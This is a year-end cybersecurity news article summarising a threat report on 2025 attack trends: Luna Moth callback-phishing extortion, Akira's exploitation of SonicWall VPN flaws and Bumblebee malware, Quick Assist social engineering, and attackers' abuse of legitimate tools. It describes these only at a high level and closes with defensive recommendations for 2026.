As 2025 draws to a close, the cybersecurity community is taking stock of a year defined more by the relentless refinement of old tactics than by novel malware. Threat actors did not reinvent cybercrime this year—they optimized it. Social engineering became more convincing, infrastructure vulnerabilities more consequential, and legitimate tools more dangerous when placed in the wrong hands.
According to a year-end threat trends analysis compiled by Stroz Friedberg, now part of LevelBlue, attackers throughout 2025 consistently blended human manipulation with technical exploitation. Coordinated campaigns targeting U.S.-based organizations relied on impersonation, remote access abuse, and the exploitation of widely deployed VPN and firewall technologies. The result was a threat environment where traditional perimeter defenses proved increasingly inadequate.
LevelBlue investigators identified sustained activity from well-known threat groups, including Luna Moth and Akira, alongside a sharp increase in attacks leveraging trusted enterprise tools such as Microsoft Quick Assist. Across these campaigns, a common pattern emerged: gain trust first, access systems second, and only then deploy malware or ransomware.
Social Engineering as the Primary Entry Point
In the first half of 2025, LevelBlue’s Incident Readiness and Response team observed a notable shift toward stealthy, human-centric intrusion methods. Rather than relying solely on exploit kits or brute-force attacks, threat actors increasingly impersonated internal IT staff, abused collaboration platforms, and even recruited individuals to secure legitimate IT roles inside target organizations.
These tactics consistently exploited human error and organizational trust, allowing attackers to bypass traditional security controls and remain undetected for extended periods. Three dominant trends shaped this activity throughout the year.
Luna Moth: Data Theft and Extortion Without Ransomware
The Luna Moth threat actor group remained highly active in 2025, particularly against professional services organizations such as law firms and financial institutions. LevelBlue linked Luna Moth to numerous data-theft incidents, followed by aggressive extortion campaigns.
Luna Moth attacks typically began with phishing emails impersonating internal IT or security personnel. Victims were instructed to call a fraudulent help desk number, where attackers posed as support staff and directed them to install legitimate remote access tools, such as Zoho Assist or Atera. Once access was granted, attackers exfiltrated sensitive data using tools such as WinSCP or by renaming files with Rclone.
Rather than deploying ransomware, Luna Moth relied on sustained harassment—repeated phone calls and emails pressuring victims to pay in exchange for non-disclosure of stolen data. LevelBlue’s investigations revealed a consistent attack chain: phishing and impersonation led to remote access, data theft, and extortion, underscoring how effective low-noise tactics can be when paired with social engineering.
Akira: VPN Exploitation and Malware at Scale
Akira was the most frequently observed threat actor in LevelBlue investigations during 2025, appearing nearly three times as often as the next most prevalent group. Two distinct trends defined Akira’s operations: exploitation of SonicWall firewall vulnerabilities and widespread deployment of Bumblebee malware.
Akira affiliates exploited two critical SonicWall flaws to gain initial access. CVE-2024-40766, disclosed in 2024, stemmed from improper access controls during firewall migrations, while CVE-2024-53704, published in January 2025, allowed authentication bypass of SSL VPN components. Both vulnerabilities enabled attackers to bypass MFA and establish persistent access to victim networks.
Once inside, Akira frequently escalated attacks by delivering Bumblebee malware via SEO poisoning. Victims searching for legitimate IT utilities were redirected to spoofed domains hosting trojanized installers. Executing these files deployed Bumblebee, enabling credential harvesting, lateral movement, data exfiltration, and ultimately the deployment of Akira ransomware to encrypt critical systems.
Quick Assist and Teams: Trust Turned Weaponized
A third major trend involved the abuse of Microsoft Quick Assist in sophisticated social engineering campaigns. These attacks often began with voice calls or Microsoft Teams messages from compromised external accounts, sometimes preceded by email bombing to create urgency and confusion.
Victims were led to believe they were receiving legitimate internal IT support and were instructed to launch Quick Assist and share device access. Because Quick Assist runs with the privileges of the logged-in user, attackers effectively inherited those permissions.
Post-compromise activity followed a methodical pattern. Threat actors conducted extensive reconnaissance using built-in Windows commands to enumerate systems, domains, and trust relationships. They established covert outbound connections using the legitimate Windows SSH client and retrieved additional tools via curl. Persistence was maintained through scheduled tasks, registry modifications, and WMI event subscriptions, with remote access tools such as ScreenConnect and AnyDesk used to sustain control. In some cases, attackers culminated operations by deploying ransomware, including Black Basta.
The Vulnerabilities That Mattered Most
Across all campaigns, the most frequently exploited vulnerabilities in 2025 targeted network intermediary devices—particularly firewalls and SSL VPN gateways. SonicWall flaws dominated investigations, but other critical issues also played a significant role.
Zero-day vulnerabilities in FortiOS, FortiProxy, and Ivanti Connect Secure enabled attackers to bypass authentication and execute remote code. Meanwhile, a critical flaw in SAP NetWeaver Visual Composer enabled arbitrary file uploads and code execution, resulting in the deployment of reverse shells, web shells, and other malware.
These vulnerabilities consistently enabled attackers to bypass MFA, persist within environments, and evade detection—often for weeks or months.
Living Off the Land Becomes the Norm
Rather than introducing new malware, attackers increasingly relied on tools already present in enterprise environments. LevelBlue observed widespread abuse of legitimate file transfer utilities, remote access software, network scanners, and command-line tools. By “living off the land,” threat actors significantly reduced their visibility to traditional endpoint detection and response platforms.
Commonly observed tools included Rclone and WinSCP for data exfiltration, Quick Assist and AnyDesk for remote access, and utilities such as PsExec, OpenSSH, and curl for command execution and lateral movement. Even standard productivity software, including Microsoft Outlook, contributed to social engineering campaigns.
Looking Ahead to 2026
The defining lesson of 2025 is clear: attackers are winning not by outpacing technology, but by outmaneuvering people. Social engineering, impersonation, and trusted tool abuse proved more effective than zero-days alone, allowing threat actors to bypass layered defenses with alarming consistency.
As organizations look to 2026, LevelBlue warns that traditional heuristic-based detection will be insufficient. Defenders must prioritize behavioral detection, identity-aware controls, and continuous monitoring of trusted tools and access pathways. The threats of tomorrow will look familiar—but they will arrive wearing a far more convincing disguise.